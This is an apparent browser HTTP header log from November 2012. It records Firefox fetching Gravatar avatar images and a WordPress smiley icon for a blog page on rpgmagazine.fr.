Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448194
Content-Length: 5740
GET /avatar/8fd92b41e0a8221a7c2f5f0006b035b1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/8fd92b41e0a8221a7c2f5f0006b035b1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272753
Content-Length: 5692
GET /avatar/692a312093d36e558bff7572ae611fe8?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/692a312093d36e558bff7572ae611fe8?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718292
Content-Length: 6135
GET /avatar/231b47730458e9cb04a75c80f56111be?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/231b47730458e9cb04a75c80f56111be?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FD)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3361694289
Content-Length: 4255
GET /avatar/6246555fc0cb282ab063f6486dd509ad?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6246555fc0cb282ab063f6486dd509ad?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F1)
Source-Age: 1005
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 150009460 149548187
Content-Length: 5378
GET /avatar/4db1d6c9f9c54e482f0b047ff980ddc7?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/4db1d6c9f9c54e482f0b047ff980ddc7?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817882
Content-Length: 4860
GET /avatar/0f7f44d4113c4dc4e1177af203ea89af?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0f7f44d4113c4dc4e1177af203ea89af?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817903
Content-Length: 6771
GET /avatar/cff06b59fd466624898849370e728f3a?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/cff06b59fd466624898849370e728f3a?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995720
Content-Length: 4176
GET /avatar/453102b0670c0502c1b6f211af64200b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/453102b0670c0502c1b6f211af64200b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995750
Content-Length: 5019
GET /avatar/41aae7711f15290b3003936f52ed65f5?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/41aae7711f15290b3003936f52ed65f5?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272809
Content-Length: 4901
GET /avatar/4720a046876483499c19977763be06e7?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/4720a046876483499c19977763be06e7?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4679)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817923
Content-Length: 5850
GET /avatar/b7d5fba6cec3cb57bd7d437d4309f917?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b7d5fba6cec3cb57bd7d437d4309f917?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4667)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099408
Content-Length: 5414
GET /site/wp-includes/images/smilies/icon_wink.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 17:43:31 GMT
Etag: &quot;18381d0-aa-461f317cb76c0&quot;
Accept-Ranges: bytes
Content-Length: 170
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /avatar/657f6254358166f66f420bbf1d051589?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/657f6254358166f66f420bbf1d051589?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272814
Content-Length: 5082
GET /avatar/e136de510683bc972b944ae371f61236?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/e136de510683bc972b944ae371f61236?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272813
Content-Length: 6512
GET /avatar/3b511a6265c623e44d9482c298cff909?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/3b511a6265c623e44d9482c298cff909?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718356
Content-Length: 3669
GET /avatar/90ac1c298f44b4b84e361b47c4c9455d?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/90ac1c298f44b4b84e361b47c4c9455d?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46DE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448268
Content-Length: 4084
GET /avatar/480ca48d549dc97844338f701cfd0157?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/480ca48d549dc97844338f701cfd0157?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F7)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 73266839
Content-Length: 4465
GET /avatar/6d648c45d7b3d3a600dfe12fcb736c4d?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6d648c45d7b3d3a600dfe12fcb736c4d?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4667)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163309
Content-Length: 3723
GET /avatar/b8d1e8f85213df2715429a8002aa73ae?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b8d1e8f85213df2715429a8002aa73ae?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995770
Content-Length: 5052
GET /avatar/563532df0b99f2e3bd57688c857319b0?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/563532df0b99f2e3bd57688c857319b0?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E0)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448260
Content-Length: 5698
GET /avatar/8faca1c98dbad7d39887fe69cdee8f30?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/8faca1c98dbad7d39887fe69cdee8f30?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3552575695
Content-Length: 6499
GET /avatar/b8e303f58d46139462ed5f7a3a6a50bb?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b8e303f58d46139462ed5f7a3a6a50bb?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119140
Content-Length: 4426
GET /avatar/9df99a69fc43d9a72d3fde1c6916bf4b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9df99a69fc43d9a72d3fde1c6916bf4b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331652
Content-Length: 4142
GET /avatar/1d429f182c1f25a956933e5e2671db19?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1d429f182c1f25a956933e5e2671db19?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718360
Content-Length: 6080
GET /avatar/aadb70dd5652a6faf85af65a885e4d1c?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/aadb70dd5652a6faf85af65a885e4d1c?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237650
Content-Length: 5148
GET /avatar/d380790f500ed1d7f90c704dac90ad78?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d380790f500ed1d7f90c704dac90ad78?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E7)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718367
Content-Length: 5730
GET /avatar/770f07b060787804894dbfdc5365b9cb?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/770f07b060787804894dbfdc5365b9cb?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E6)
Source-Age: 0
